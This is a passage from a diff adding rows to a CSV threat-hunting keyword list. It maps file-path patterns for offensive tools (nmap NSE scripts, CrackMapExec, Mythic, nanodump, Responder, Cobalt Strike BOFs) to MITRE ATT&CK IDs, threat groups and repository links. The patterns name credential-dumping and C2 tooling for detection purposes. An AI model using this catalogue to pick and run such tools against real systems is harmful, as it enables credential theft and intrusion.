+"*/ms-sql-empty-password.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/mssqlexec.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*/ms-sql-hasdbaccess.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/ms-sql-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/ms-sql-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/mssqlproxy.git*","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","10","7","682","113","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z"
+"*/ms-sql-query.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/ms-sql-tables.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/ms-sql-xp-cmdshell.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/mtrace.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/MultiPotato.git*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z"
+"*/murmur-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/mushishi.h*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. 
identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/mysql-audit.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/mysql-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/mysql-databases.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/mysql-dump-hashes.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/mysql-empty-password.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/mysql-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/mysql-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/mysql-query.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/mysql-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/mysql-variables.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/mysql-vuln-cve2012-2122.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/Mystikal.git*","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","245","35","2023-05-10T15:21:26Z","2021-05-03T14:46:16Z"
+"*/mystikal.py*","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","245","35","2023-05-10T15:21:26Z","2021-05-03T14:46:16Z"
+"*/Mythic/mythic*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z"
+"*/Mythic_CLI*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z"
+"*/MythicAgents/*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - 
T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z"
+"*/MythicAgents/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z"
+"*/MythicC2Profiles/*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z"
+"*/mythic-cli*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z"
+"*/MythicConfig.cs*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z"
+"*/mythic-react-docker*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z"
+"*/mzet-/les-res*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
+"*/n1nj4sec/pupy*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*/nanodump*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z"
+"*/nanodump.*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*/nanodump.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*/nanorobeus.git*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z"
+"*/nanorubeus/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z"
+"*/Native/SigFlip/*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z"
+"*/nat-pmp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/nat-pmp-mapport.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/nbd-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/nbns-interfaces.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/nbstat.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/NBTNS.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z"
+"*/nccgroup/nccfsas/*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z"
+"*/ncp-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/ncp-serverinfo.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/ncrack-*","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","0","N/A","N/A","10","972","238","2023-02-22T21:33:24Z","2015-12-21T23:48:00Z"
+"*/ncrack.git*","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","972","238","2023-02-22T21:33:24Z","2015-12-21T23:48:00Z"
+"*/ndmp-fs-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/ndmp-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/ndp_spoof*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z"
+"*/Needle_Sift_BOF/*","offensive_tool_keyword","cobaltstrike","Strstr with user-supplied needle and filename as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/EspressoCake/Needle_Sift_BOF","1","1","N/A","10","10","30","7","2021-09-27T22:57:33Z","2021-09-27T20:13:10Z"
+"*/nessus.py*","offensive_tool_keyword","crackmapexec","parser nessus.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*/nessus.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
